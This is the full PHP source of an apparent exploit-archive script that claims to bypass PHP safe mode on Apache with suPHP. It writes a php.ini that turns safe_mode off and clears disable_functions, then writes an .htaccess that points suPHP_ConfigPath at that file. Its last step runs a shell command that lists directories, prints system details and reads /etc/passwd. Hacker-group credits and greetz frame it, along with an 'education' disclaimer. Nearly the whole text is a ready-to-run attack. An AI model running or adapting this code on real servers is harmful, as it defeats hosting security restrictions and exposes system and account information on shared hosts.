|
=0D
/*=0D
apache 1.x <=> 2.x suphp (suPHP_ConfigPath) bypass safe mode exploit=0D
Author : Mr.SaFa7 =0D
Home : v4-team.com=0D
note : this exploit for education :)=0D
*/=0D
=0D
=0D
echo "[+] Start...\n";=0D
=0D
$bypfile=fopen('php.ini','w+');=0D
$stuffile=fopen('.htaccess','w+');=0D
if($bypfile and $stuffile!= NULL){=0D
=0D
echo "[+] evil files created succes ! \n";=0D
=0D
}=0D
else{=0D
echo "[-] access denial ! \n";=0D
=0D
}=0D
$byprullz1="safe_mode = OFF=0D
=0D
";=0D
=0D
$byprullz2="disable_functions = NONE";=0D
$dj=fwrite($bypfile,$byprullz1);=0D
=0D
$dj1=fwrite($bypfile,$byprullz2);=0D
=0D
fclose($bypfile);=0D
if($dj and $dj1!= NULL){=0D
echo "[+] php.ini writed \n";=0D
=0D
}=0D
else{=0D
echo "[-] 404 php.ini not found !\n";=0D
}=0D
$breakrullz="suPHP_ConfigPath /home/user/public_html/php.ini"; // replace this '/home/user/public_html' by ur path =0D
=0D
$sf7=fwrite($stuffile,$breakrullz);=0D
=0D
fclose($stuffile);=0D
if($sf7!= NULL){=0D
=0D
echo "[+] evil .htaccess writed\n";=0D
echo "[+] exploited by success!\n\n\n";=0D
echo "\t\t\t[+] discouvred by Mr.SaFa7\n";=0D
echo "\t\t\t[+] home : v4-team.com\n";=0D
echo "\t\t\t[+] Greetz : djekmani4ever ghost hacker Str0ke ShAfEKo4EvEr Mr.Mn7oS\n";=0D
}=0D
else{=0D
=0D
echo "[-] evil .htaccess Not found!\n";=0D
}=0D
=0D
=0D
system("pwd;ls -lia;uname -a;cat /etc/passwd");=0D
=0D
#EOF=0D
?>=0D
=0D